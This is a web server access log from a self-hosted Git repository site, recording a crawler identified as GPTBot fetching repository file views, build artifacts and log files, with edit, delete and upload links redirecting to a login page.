"https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.Development.json" -[17/Feb/2026:16:43:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/appsettings.Development.json" [Client 74.7.227.38] [Length 10597] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.Development.json" -[17/Feb/2026:16:43:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/OpcUaMinimal/TestService/obj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj" -[17/Feb/2026:16:43:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/OpcUaMinimal/TestService/obj" -[17/Feb/2026:16:43:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/Program.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Program.cs" -[17/Feb/2026:16:43:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/Program.cs" -[17/Feb/2026:16:43:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/Worker.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Worker.cs" -[17/Feb/2026:16:43:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/Worker.cs" -[17/Feb/2026:16:43:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/Program.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/Program.cs" -[17/Feb/2026:16:43:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/Program.cs" -[17/Feb/2026:16:43:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker/static/js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js" -[17/Feb/2026:16:43:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker/static/js" -[17/Feb/2026:16:43:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/Worker.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/Worker.cs" -[17/Feb/2026:16:43:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/Worker.cs" -[17/Feb/2026:16:43:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/static/js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js" -[17/Feb/2026:16:43:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/static/js" -[17/Feb/2026:16:43:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/Worker.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Worker.cs" -[17/Feb/2026:16:43:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/Worker.cs" -[17/Feb/2026:16:43:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.Development.json?display=source" [Client 74.7.227.38] [Length 11512] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.Development.json" -[17/Feb/2026:16:43:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/obj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj" -[17/Feb/2026:16:43:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/obj" -[17/Feb/2026:16:43:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/appsettings.Development.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/appsettings.Development.json" -[17/Feb/2026:16:43:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/appsettings.Development.json" -[17/Feb/2026:16:43:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/appsettings.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/appsettings.json" -[17/Feb/2026:16:43:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/appsettings.json" -[17/Feb/2026:16:43:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:43:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15366] [Gzip 8.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:43:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 1524] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:16:43:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 305108] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:16:43:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 310973] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:16:43:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 923896] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:16:43:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 30717] [Gzip 11.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" -[17/Feb/2026:16:43:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 163197] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:16:43:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 2931] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:16:43:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 2929] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:16:43:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 15008] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" -[17/Feb/2026:16:43:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 25334] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" -[17/Feb/2026:16:43:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 410168] [Gzip 15.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" -[17/Feb/2026:16:43:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 2437] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:16:43:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 14676] [Gzip 4.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" -[17/Feb/2026:16:43:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" -[17/Feb/2026:16:43:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10964] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:16:43:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:16:43:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:16:43:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:16:43:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:16:43:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 2437] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:16:43:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 159348] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:16:43:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:16:43:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:16:43:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:16:43:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:16:43:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:16:43:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:16:43:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:16:43:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:16:43:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:16:43:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:16:43:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:16:43:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:16:43:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:16:43:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:16:43:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:16:43:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:16:43:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr 